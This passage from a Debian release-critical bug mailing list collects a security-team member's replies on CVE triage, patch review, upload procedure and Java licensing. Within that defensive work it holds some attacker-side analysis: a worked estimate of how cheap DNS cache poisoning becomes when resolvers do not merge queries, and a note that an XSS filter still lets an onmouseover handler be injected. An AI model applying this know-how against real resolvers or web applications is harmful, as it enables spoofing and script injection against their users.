++ const __mpz_struct *argspace)) {
+   __mpz_struct argmpz, resmpz;
+  mp_limb_t argspace[LIMBS_PER_OBJPTR + 1];
+ 
+@@ -284,7 +284,7 @@ objptr IntInf_notb (objptr arg, size_t bytes) {
+ 
+ static objptr shary (objptr arg, Word32_t shift, size_t bytes,
+  void(*shop)(__mpz_struct *resmpz,
+- __gmp_const __mpz_struct *argspace,
++ const __mpz_struct *argspace,
+  unsigned long shift))
+ {
+   __mpz_struct argmpz, resmpz;
+-- 
+1.7.10.4
+
diff -Nru mlton-20100608/debian/patches/series 
mlton-20100608/debian/patches/series
--- mlton-20100608/debian/patches/series2011-07-19 13:54:28.0 
+0200
+++ mlton-20100608/debian/patches/series2013-10-19 19:37:48.0 
+0200
@@ -1,2 +1,3 @@
 11-fixes-20100608-to-20110319.patch
 22-fixes-20110319-to-20110719.patch
+Replace-__gmp_const-with-const.patch


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#709382: Built-Using, libgcc, and libc_nonshared

[Florian Weimer]

* Russ Allbery:

 Clearly no one else in the world is worrying about this; there's lots of
 GPLv2-only software out there and all the distributions are happily
 distributing binaries built with current GCC without worrying about this.
 I'm not sure to what extent we can use that as an excuse, though.

FYI, this is [gnu.org #435945], filed about three years ago.  I
haven't received any substantiated reaction from the FSF.

A similar thing must happened during the transition from GPLv1 to
GPLv2 and would still apply to GPLv1 software.

Nowadays, we could switch to compiler-rt after porting it to more
architectures.  Or we could branch the old version of libgcc with the
permissive linking exception and maintain that, asking subsequent FSF
contributors to relicense their patches under the old terms (which
they can do under their copyright assignment contract with the FSF, I
think).


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#706414: CVE-2013-3266: Insufficient input validation in the NFS server

[Florian Weimer]

* Steven Chamberlain:

 Hi,

 On 22/05/13 19:46, Florian Weimer wrote:
 Sorry for the delay.  I'm taking care of this now.

 Thank you for the DSA.

 I notice a problem though when this was (I think - I'm unsure of the
 security team's processes here) copied to the main archive, probably so
 that it can be included in stable-proposed-updates:

Thanks for noticing.

I don't see package in the stable queue:

http://release.debian.org/proposed-updates/stable.html

And the dak mirror on ries.debian.org hasn't got it, either.

Could you contact ftpmaster and/or the stable release managers about
this?  I don't think we can do anything about it on the security side.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#706414: CVE-2013-3266: Insufficient input validation in the NFS server

[Florian Weimer]

* Steven Chamberlain:

 On 01/05/13 15:20, Christoph Egger wrote:
 Florian Weimer f...@deneb.enyo.de writes:
 Looks good.  Please upload to security-master directly.  You have to
 rebuild with -sa, though, so that the upstream tarball is included in
 the upload.
 
 Should be somewhere in your queue now

 Was the upload (src:kfreebsd-9) okay?  Do you need anything further from us?

Sorry for the delay.  I'm taking care of this now.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#708267: cve-2002-2443: kpasswd udp ping-pong

[Florian Weimer]

* Tom Yu:

 Some limited testing indicates that when the packet storm is confined
 to a single host, legitimate kpasswd and kadm5 requests can still get
 through, and the CPU usage pegs at about 70%.  I haven't tested with
 multiple hosts involved.

Out of curiosity, how many spoofed packets have you injected?


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#708267: cve-2002-2443: kpasswd udp ping-pong

[Florian Weimer]

* Tom Yu:

 Florian Weimer f...@deneb.enyo.de writes:

 * Tom Yu:

 Some limited testing indicates that when the packet storm is confined
 to a single host, legitimate kpasswd and kadm5 requests can still get
 through, and the CPU usage pegs at about 70%.  I haven't tested with
 multiple hosts involved.

 Out of curiosity, how many spoofed packets have you injected?

 I only did some proof of concept testing with a single spoofed packet.

Okay, that explains the limited impact. 8-)


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#708267: cve-2002-2443: kpasswd udp ping-pong

[Florian Weimer]

* Sam Hartman:

 I assume this goes back to squeeze as well.

 Shouldn't the severity be higher? This seems probably worth a DSA
 because such ping-pong attacks can really be bad for a network/server.
 Or am I missing mittigations?

Yes, packet loops can be annoying.  I think we should issue a DSA for
this.

 I'd be happy to work on packages.

Thanks!


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#708267: cve-2002-2443: kpasswd udp ping-pong

[Florian Weimer]

* Sam Hartman:

 Florian == Florian Weimer f...@deneb.enyo.de writes:


 Florian Yes, packet loops can be annoying.  I think we should issue
 Florian a DSA for this.

 OK, do you want me to prepare patches and builds for squeeze and wheezy?

Yes, that would be ideal.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#708291: libjansi-native-java: package appears to be unusable

[Florian Weimer]

Package: libjansi-native-java
Version: 1.0-3
Severity: grave

The package claims to provide JNI libraries, but is architecture: all.
For some reason, there are no DSOs in the JAR files.

I think as it stands, the package is completely usable.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#708164: nginx proxy_pass buffer overflow (CVE-2013-2070)

[Florian Weimer]

* Thijs Kinkhorst:

 A buffer overflow in the proxy_pass module has been reported by
 Nginx upstream, and a patch made available. Please see:
 http://www.openwall.com/lists/oss-security/2013/05/13/3

 The issue is already fixed in the version in sid, and as far
 as I can see the code is not present in squeeze.

 Can you ensure that (a) the RC bug against nginx in sid is dealt with
 so the fixed package can migrate to jessie, and (b) prepare an update
 to wheezy?

Note that the upstream patch is not 100% correct C (the overflow check
can be optimized by the compiler).  Therefore, the generated assembly
has to be inspected to ensure that the check is actually in place.

Here's a bit of background information:

http://cert.uni-stuttgart.de/ticker/advisories/c-integer-overflow.html
https://www.securecoding.cert.org/confluence/display/seccode/INT32-C.+Ensure+that+operations+on+signed+integers+do+not+result+in+overflow


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#706414: CVE-2013-3266: Insufficient input validation in the NFS server

[Florian Weimer]

* Christoph Egger:

 Hi!

 Steven Chamberlain ste...@pyro.eu.org writes:
 tags 706414 + pending
 thanks

 I've applied upstream's patch in SVN, I'm running it now on my NFS
 server and seems okay.

 Christoph, would you be able to do an upload of this to unstable please?

 I'm building right now. As it is too late for wheezy r0 it seems we'll
 need to go through either security or stable-updates for wheezy
 (security Cc-ed and patch attached to get that going).

Thanks.  Can you send a debdiff for an upload targeted at
wheezy-security, and prepare packages (which have to be built
with -sa)?


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#706414: CVE-2013-3266: Insufficient input validation in the NFS server

[Florian Weimer]

* Christoph Egger:

 Packages will be in people.d.o:~christoph soon (or shall I upload to
 security directly?

Looks good.  Please upload to security-master directly.  You have to
rebuild with -sa, though, so that the upstream tarball is included in
the upload.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#690817: Is that bug still open?

[Florian Weimer]

* Ingo Jürgensmann:

 I'm fine with that, but unfortunately you didn't answer my question
 regarding the prominent warning about security issues that is still
 left open and visible to the end user. Please see the attached
 screenshots.

This appears to be a different bug.  Apparently, Drupal phones home.
We generally patch out such functionality.


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#691394: opendkim: DomainKeys Identified Mail (DKIM) Verifiers may inappropriately convey message trust

[Florian Weimer]

* Scott Kitterman:

 This is not something that can be dealt with operationally.  Unlike
 GPG, where keys are trusted based on signatures and web of trust
 (and people can decline to sign bad keys), in DKIM keys are trusted
 based on their being published in the sending domain's DNS and there
 is no human in the loop.

I still don't see how this is different from the OpenPGP situation.

Assuming that DNS is secure enough, If the sender doesn't publish a
short key, it's not possible to use one.  There is also no certificate
chaining which could result in an unknown set of potentially
problematic certificates.  It really boils down to using DKIM
correctly.

Rejecting short keys still has value because without such drastic
measures, insecure cryptography works as well as secure cryptography,
but I don't think this warrants a security update.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#689755: bind9: memory hole in named

[Florian Weimer]

* Christoph Anton Mitterer:

 On Mon, 2012-10-08 at 07:14 +0200, Florian Weimer wrote:
 Have you configured a memory limit for the cache?
 Which would you mean max-cache-size or max-acache-size?

Not sure.  I think in my days, there was max-cache-size only.

 Well I think that's a design bug then in bind, ... cause it can’t just
 grow and grow... and then die when it runs out of memory.

Please try again with max-cache-size.  It's still possible that you
run into a genuine memory leak.


--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#689755: bind9: memory hole in named

[Florian Weimer]

retitle 689755 bind9: memory leak in named
thanks

* Christoph Anton Mitterer:

 Since some update (unfortunately I forgot which one,.. but it's at
 least months ago) I experiece a memory hole in named.

Have you configured a memory limit for the cache?  By default, there
is no limit, and records are only removed from the resolver cache when
they expire.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#682826: world writable directories possible patch

[Florian Weimer]

 Using chmod 1777 could help?

 I attached a patch just in case it does.

Not really, I think.  Users cannot build .fasl files for other users
because they could supply crafted ones which do something different
from what the original Lisp sources do.


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#682826: world writable directories possible patch

[Florian Weimer]

* Barak A. Pearlmutter:

  - have a setuid program that builds fasl files from trusted sources,
which in practice means download them itself or from .deb packages

Or a daemon, given that it's difficult to write SUID programs in Lisp.
I thought we had common-lisp-controller for that?


-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#679828: libc6: No easy way of enabling DNSSEC validation aka RES_USE_DNSSEC

[Florian Weimer]

* Matthew Grant:

 From my investigations this can only be enabled by recompiling each bit
 of software to set the RES_USE_DNSSEC flag in _res.options, as well as
 RES_USE_EDNS0. (Please see racoon bug #679483).  The enablement method
 is from openssh 6.0p1, openbsd-compat/getrrsetbyname.c 

This does not actually activate DNSSEC, it just tells the recursive
resolver that the application is able to process DNSSEC records.  The
application would still have to validate them.

Applications should never need to set the RES_USE_DNSSEC flag because
it does not make sense to treat DNSSEC-signed data differently from
unsigned data.

 Please create a resolv.conf flag so that RES_USE_DNSSEC is available
 to the systems administrator, and maybe a debconf screen to select it.

This alone wouldn't make any difference to the spoofing problem.

libc is not the correct place to put DNSSEC validation because many
processes are shortlived and would have to fetch all key material and
signatures from DNS, beginning at the root.  This would turn a single
name resolution into six or more DNS queries, which is excessive.

At this stage, you should run a BIND or Unbound process restricted to
localhost which performs the validation.  This validation will happen
even for applications which do not set the RES_USE_DNSSEC flag.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#679272: bcfg2-server: unescaped shell command issues in the Trigger plugin

[Florian Weimer]

* Arto Jantunen:

 In Debian (and all other distros I know of) the bcfg2 server runs as
 root, so in practice this is a remote root hole (limited to attackers
 who can connect to the bcfg2 server (protected by a password and/or an
 ssl key)).

 .dsc and .debian.tar.gz for a fixed package are attached. I'll upload
 the fix to unstable next.

There's a spurious diff in the changelog:

 bcfg2 (1.0.1-3+squeeze1) stable-security; urgency=high
 
   * Apply patch from Chris St. Pierre to fix several problems with
-unescaped shell commands (Closes: #640028).
+unescaped shell commands

But the actual patch seems fine.  Please build without -sa and upload
to security-master.  Thanks!



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#658276: libcurl3: Doesn't work for all sites anymore

[Florian Weimer]

* Alessandro Ghedini:

 Anyway, you can upload to security-master when ready.  You must build
 the package with specifying the -sa flag, on a squeeze system.

 Ok, thank you.

Thanks for uploading.  I'm a bit confused--is this an interoperability
issue introduced by DSA-2398-1?



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#658276: libcurl3: Doesn't work for all sites anymore

[Florian Weimer]

* Alessandro Ghedini:

 We should fix this through stable-security. Please send a debdiff once
 the fix has been testing in unstable for a few days.

 Attached is the debdiff for stable-security.

Looks good.

 If everything's ok I will upload it (I'm a DD since a few hours) in
 a few days, once the sid version has been tested more.

Do you really think this option will actually be used in practice,
except if there's a failure?

Anyway, you can upload to security-master when ready.  You must build
the package with specifying the -sa flag, on a squeeze system.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#665656: openarena-server: is vulnerable for getstatus DRDoS attack

[Florian Weimer]

* Simon McVittie:

 Dear security team: what do you consider the severity of this bug to be?
 Is it the sort of thing you issue DSAs for?

So the problem seems to be traffic amplification by a factor or 250.
(around 2000 bytes in, 500,000 bytes out).  Is this correct?

Is there any experience which strongly suggests that deploying the
patch actually helps victims?  Then we should issue a DSA.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#665656: openarena-server: is vulnerable for getstatus DRDoS attack

[Florian Weimer]

* Simon McVittie:

 Some proposed updates using the patch from ioquake3 are in my home
 directory on alioth:
 http://alioth.debian.org/~smcv/. Patch for review:
 http://anonscm.debian.org/gitweb/?p=pkg-games/openarena.git;a=commitdiff;h=caeb284533211bb0f76872279106a49306290168

Thanks for working on this.

Please set the distribution to squeeze-security, adjust the version
number, build with -sa, and upload to security-master.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#661150: dropbear: CVE-2012-0920 SSH server use-after-free vulnerability]

[Florian Weimer]

* Gerrit Pape:

 For stable, I backported the fix to 0.52, swiftly checked with upstream
 (thx Matt), and prepared theses changes (debdiff attached):

Thanks.  Please build with -sa and upload to security-master.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#659899: CVE-2011-0790: XSS

[Florian Weimer]

* Antoine Beaupré:

 ++   $h =~ s/[%]/./g;

 ++$step =~ s/[%]/./g; 

 ++$mode =~ s/[%]/./g;

 ++$t =~ s/[%]/./g; 

 ++$targ =~ s/[;%]/./g;

 ++$hierarchy =~ s/[;%]/./g;

These patterns do not match the special character .  Therefore, it is
still possible to escape from the target=$t parameter (for example)
and inject an onmouseover handler.

I would prefer if this could be fixed.  Has upstream already released
this patch as a security update?



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#661509: security.debian.org: Packages-file for squeeze-amd64 broken

[Florian Weimer]

* Tim Riemenschneider:

 security.debian.org is currently unusable (for amd64 squeeze)

I cannot reproduce this (at 20:17 CET).  What does currently mean,
exactly?



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#659899: CVE-2011-0790: XSS

[Florian Weimer]

* Antoine Beaupré:

 I don't actually know - I followed your lead and used that patch in the
 bugzilla Redhat bugtrackers:

 https://bugzilla.redhat.com/attachment.cgi?id=556619action=diffcontext=patchcollapsed=headers=1format=raw

Okay, I'm notifying folks that this patch is probably not correct.
In the meantime, could you prepare an update which also strips the
 character (and = as well, just to be sure).  Let's hope that this
doesn't break any functionality.



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#659899: CVE-2011-0790: XSS

[Florian Weimer]

* Antoine Beaupré:

 I don't actually know - I followed your lead and used that patch in the
 bugzilla Redhat bugtrackers:

 https://bugzilla.redhat.com/attachment.cgi?id=556619action=diffcontext=patchcollapsed=headers=1format=raw

*grml*

Fedora has already released the potentially incorrect patch.  I've
asked on the oss-security mailing list.  Sorry for the delay.



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#659296: Comments on the 0.4.1-6 upload

[Florian Weimer]

Vasudev Kamath asked me to include this information in the bug report.

From: Florian Weimer f...@deneb.enyo.de
Subject: Re: Accepted surf 0.4.1-6 (source i386)
To: Vasudev Kamath kamathvasu...@gmail.com
Date: Fri, 10 Feb 2012 23:18:36 +0100
Message-ID: 87vcnemiwz@mid.deneb.enyo.de

* Vasudev Kamath:

  surf (0.4.1-6) unstable; urgency=high
  .
* QA upload.
* debian/patches:
  + Added fix-insecure-permissions.patch to fix world readable cookie jar
vulnerability CVE-2012-0842. (Closes: #659296)

-   g_mkdir_with_parents(apath, 0755);
+   g_mkdir_with_parents(apath, 0700);

I think you should also downgrade the permissions from 0755 if the
directory exists (in case we want to keep the package alive, which I doubt).

[Addendum: It is sufficient to do this with just one component of the
path.]



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#388141: Let's ask for a relicensing agreement

[Florian Weimer]

* David Prévot:

 provided to the Debian website

Perhaps it could be made clearer that this applies to the web site
proper and not to other contributions to Debian which also appear on
the web.

I think there should be a paragraph about third party contributions
submitted by the recipient.  The recipient cannot relicense those, and
must give the impression of doing so.

 - members of security team who provided DSA (in security/year/);

Are they really covered by copyright?



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#516394: djbdns

[Florian Weimer]

* Russ Allbery:

 The remaining statement on this bug from the security team is:

 | djbdns should not be part of squeeze until it is properly hardened
 | against cache poisoning.  It is between 100 and 200 times easier than
 | with other DNS servers.

 I don't understand the basis of that comment just from the bug log.  The
 djbdns-specific attack I'm aware of is on SOA, but the bug discussion
 indicates that protecting against SOA isn't sufficient and any cache miss
 will do.  So apparently there's some hardening other than UDP port
 randomization (which djbdns has done for eons) that needs to be done here
 from the security team perspective?  It looks like the hardening that they
 want to implement is duplicate query merging?

Here's an attempt of a write-up of the maths involved, ready for
pasting into LaTeX.  Hopefully, it's not too embarrassing for me.
It's been a while I did such stuff, probability theory wasn't my
forte, and I have no idea what to do to reduce the final quotient.

Suppose the resolver chooses among $N$ distinct secrets (combinations
of source ports, IP addresses and transaction identifiers, etc.).  To
simplify things, we assume that subsequent choices are uniformly
distributed and independent.

If the resolver merges multiple queries for the same record, all we
can do is to supply $m$ distinct guesses for its choice.  Each
iteration has a probability of $\frac m N$ for success, and we have to
process $m + 2$ packets per total ($m$ guesses, a triggering query,
and its response).  This means that we have to send or receive
\[(m + 2)\left(\frac N m + 1\right) \cong N\] packets on average until
we reach a successful attempt, assuming that $m$ is much smaller than
$N$.

If the resolver does not merge multiple queries, but allows up to $n$
parallel queries, the mist straightforward way is to push up the
success probability by sending $n$ parallel queries per attempt.  For
each of those queries, the resolver chooses a distinct secret.  We can
assume the attacker does the same for her $m$ guesses.  This
experiment results in one of
\[\left(N \atop n\right)\left(N \atop m\right)\]
outcomes.  An outcome is unsuccessful if the victim and attacker set
do not intersect.  This means that their union is one of
$\bigl({N\atop n+m}\bigr)$ sets.  Each of those can be distributed
among victim and attacker in
$\bigl({n+m\atop n}\bigr)=\bigl({n+m\atop m}\bigr)$ ways, resulting
in a total of
\[\left(N\atop n+m\right)\left(n+m\atop n\right)
=\left(N\atop n\right)\left(N-n\atop m\right)\]
unsuccessful outcomes.  Thus, the probablity of failure is
\[\left(N-n\atop m\right)\left/\left(N\atop m\right)\right.
=\left(N-m\atop N-n-m\right)\left/\left(N\atop N-n\right)\right.
.\]
Each of these attempts requires processing of $m + 2n$ packets.

Putting $N = 2^{30}$, $n=200$, $m=10^4$ yields
$2^{30}\cong1.07\times10^9$ packets for the first approach, and
$5.59\times10^6$ for the second approach, which means that the second
approach is approximately $192$ times cheaper.

 Except that my understanding of the attack is that it requires
 issuing DNS lookups for a (*very*) large number of RRs that are not
 in the local cache.  This is difficult to force a service to do.

Your MTA probably does DNS lookups with user-supplied domain names
(for EHLO and perhaps for MAIL FROM:, if you use things like SPF).
Your browser does as well, although there are some attempts at
limiting Javascript-driven parallel requests.

The general problem with these attacks is that they are likely to take
out your local resolver, but that's a different issue.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#652371: [CVE-2011-4824] SQL injection issue in auth_login.php

[Florian Weimer]

Package: cacti
Version: 0.8.7g-1
Tags: security upstream fixed-upstream
Severity: grave

Several vulnerabilities have been disclosed in cacti:

| SQL injection vulnerability in auth_login.php in Cacti before 0.8.7h
| allows remote attackers to execute arbitrary SQL commands via the
| login_username parameter.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4824

The upstream announcement also mentions Cross-site scripting issues:
http://www.cacti.net/release_notes_0_8_7h.php

Would you please fixed packages for lenny and squeeze and send a
source debdiff to the security team?



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#645881: critical update 29 available

[Florian Weimer]

* Philipp Kern:

 sun-java6 is sadly still a very high profile package.  I won't go and
 break all those installations which force sun-java6 over openjdk-6
 locally, either in unattended installations or through other means.

It's really unfortunate that most of those installations seem to need
sun-java6-plugin, which the package which is actually dangerous to
install.  (Presumably, only the first stage payload is pure Java, and
the dropped malware won't run, but it's a bit unsettling.)  At least
this package doesn't seem to be install without explicit request, so
it's not extremely bad.

 openjdk-6 might well be a viable replacement in wheezy, but there
 are no efforts to backport those compatibility patches that might be
 in newer versions.

We will have to switch to a different IcedTea version in squeeze
because the 1.8 branch we currently use will cease to receive security
fixes soonish, probably after the next round of updates.  If we switch
to branch where the plugin is separate (1.10 and later, IIRC), we
could start fixing compatibility issues more aggressively if we wanted
to.

 openjdk-6 might well be a viable replacement in wheezy, but there
 are no efforts to backport those compatibility patches that might be
 in newer versions.

I doubt it.  The incompatibilities do not vanish, unless there is a
critical mass of users who also contribute bug fixes.  We just don't
seem to be there yet.

(I also doubt that Oracle can drop security support for the Java 6
plugin in mid-2012, for mostly the same reason, at lesat if they don't
want to be entirely reckless.  They haven't even started pushing
Java 7 to end users yet.)



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#645881: critical update 29 available

[Florian Weimer]

* Matthias Klose:

 On 12/11/2011 01:07 PM, Holger Levsen wrote:
 Hi,
 
 On Sonntag, 11. Dezember 2011, Philipp Kern wrote:
 sorry, but I'd rather like to have an announcement that it has a bug,
 
 me too, for all the reasons Philipp noted.
 
 It's also trivial to download the fixed jdk from oracle and build a fixed
 package, so IMHO an announcement containing these information plus no
 removal would be best:

 the DLJ bundles were created because you are not allowed to re-distribute the
 jdk packages from oracle. Did that change recently?

The main difference seems to be this (DLJ first):

| [...] Sun also grants you a non-exclusive, non-transferable,
| royalty-free limited license to reproduce and distribute the
| Software [...]  provided that: (b) the Software is distributed with
| your Operating System, and such distribution is solely for the
| purposes of running Programs under the control of your Operating
| System and designing, developing and testing Programs to be run
| under the control of your Operating System; [...]

| [...] Oracle grants you a non-exclusive, non-transferable, limited
| license without fees to reproduce and distribute the Software,
| provided that (i) you distribute the Software complete and
| unmodified and only bundled as part of, and for the sole purpose of
| running, your Programs, [...]

Other problematic clauses (indemnification, no bundling with
reimplementatiosn of java.* classes and so on) are also part of the
DLJ.

(I still don't understand why the DLJ was suitable for non-free, so
I'm clearly not qualified to judge these license matters for Debian.)



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#651225: Security vulnerabilities (CVE-2011-2904, CVE-2011-3263, CVE-2011-3265, CVE-2011-4674)

[Florian Weimer]

Package: zabbix
Version: 1:1.8.2-1squeeze2
Tags: security
Severity: grave

There appear to be several unfixed unverabilities in Zabbix in
squeeze, including SQL injection vulnerabilities:

http://security-tracker.debian.org/tracker/CVE-2011-2904
http://security-tracker.debian.org/tracker/CVE-2011-3263
http://security-tracker.debian.org/tracker/CVE-2011-3265
http://security-tracker.debian.org/tracker/CVE-2011-4674

We would appreciate if you prepared fixed packages and contacted the
security team (preferably with a source debdiff of the porposed
upload).  Thanks.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#650880: aptitude safe-upgrade segfaults, aptitude update fails: E: Encountered a section with no Package: header

[Florian Weimer]

reopen 650880
reassign 650880 aptitude
retitle 650880 aptitude segfaults with malformed Packages file
severity 650880 normal
tags 650880 -security
thanks

* Ralf Spenneberg:

 Running aptitude upgrade then fails:

 LANG=C aptitude safe-upgrade
 Reading package lists... Error!
 E: Encountered a section with no Package: header
 E: Problem with MergeList 
 /var/lib/apt/lists/security.debian.org_dists_lenny_updates_main_binary-amd64_Packages
 E: The package lists or status file could not be parsed or opened.
 Reading package lists... Error!
 Speicherzugriffsfehler

(That's actually segmentation fault.)

The security archive has been fixed, but the aptitude crash above
appears to be a separate issue worth fixing, so reopening.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#645881: critical update 29 available

[Florian Weimer]

* Moritz Mühlenhoff:

 Florian, what's the status of openjdk6 for stable/oldstable?

I've released the pending update for squeeze.  lenny will eventually
follow, and so will the pending updates for squeeze, but judging by my
past performance, it will take a while.

If someone else wants to work on these updates, I'll gladly share what
I've learnt about the packaging.



--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#648373: [CVE-2011-4130] Use-after-free issue

[Florian Weimer]

* Francesco P. Lovergine:

 A use-after-free issue has been discovered in ProFTPd:
 
 http://bugs.proftpd.org/show_bug.cgi?id=3711
 
 It seems that squeeze is vulnerable, too.  I haven't checked the code
 in lenny yet.

 I have 1.3.3a-6squeeze3 ready for squeeze with the required fix. 
 Waiting for a secteam go signal, just in case.

Thanks.  I trust that the call is at the right place, I find the code
somewhat confusing.

Please upload with the usual caveats (1.3.3a-6squeeze2 as version
number, squeeze-security suite, host security-master).



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#648359: [CVE-2011-4000] Unspecified buffer overflow vulnerability

[Florian Weimer]

Package: libchasen2
Version: 2.4.4-16
Severity: grave
Tags: security

JPCERT disclosed an unspecified buffer overflow vulnerability in
ChaSen:

http://jvn.jp/en/jp/JVN16901583/index.html

Apparently, upstream will not provide patches.  Would you be willing
to work on this issue if we can obtain further details?



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#648373: [CVE-2011-4130] Use-after-free issue

[Florian Weimer]

Package: proftpd-dfsg
Version: 1.3.3a-6squeeze1
Severity: grave
Tags: security

A use-after-free issue has been discovered in ProFTPd:

http://bugs.proftpd.org/show_bug.cgi?id=3711

It seems that squeeze is vulnerable, too.  I haven't checked the code
in lenny yet.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#645881: critical update 29 available

[Florian Weimer]

* Moritz Muehlenhoff:

 As for stable/oldstable: I noticed that Red Hat provided packages for
 update 29 for RHEL 4 (RHEL 5 onwards use OpenJDK): 
 http://lwn.net/Articles/463919/

If anyone remembers the rationale behind the DLJ, perhaps they can
check if the current BCL matches our needs, too?  The licensing
conditions for the stock JDK distribution probably have changed since
the Oracle acquisition, and perhaps these changes are sufficient to
permit redistribution by Debian.

I have also uploaded the fixes for openjdk-6 to security-master (for
squeeze).  It's currently stuck in the unchecked queue, along with the
still-missing previous update for lenny.



-- 
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org

Bug#645881: critical update 29 available

[Florian Weimer]

* Thijs Kinkhorst:

 Upstream has released Java SE 6 update 29 yesterday:
 http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html
 with security fixes.

Does the lack of a DLJ version affect us?  The special distributor
license is no longer available from Oracle:

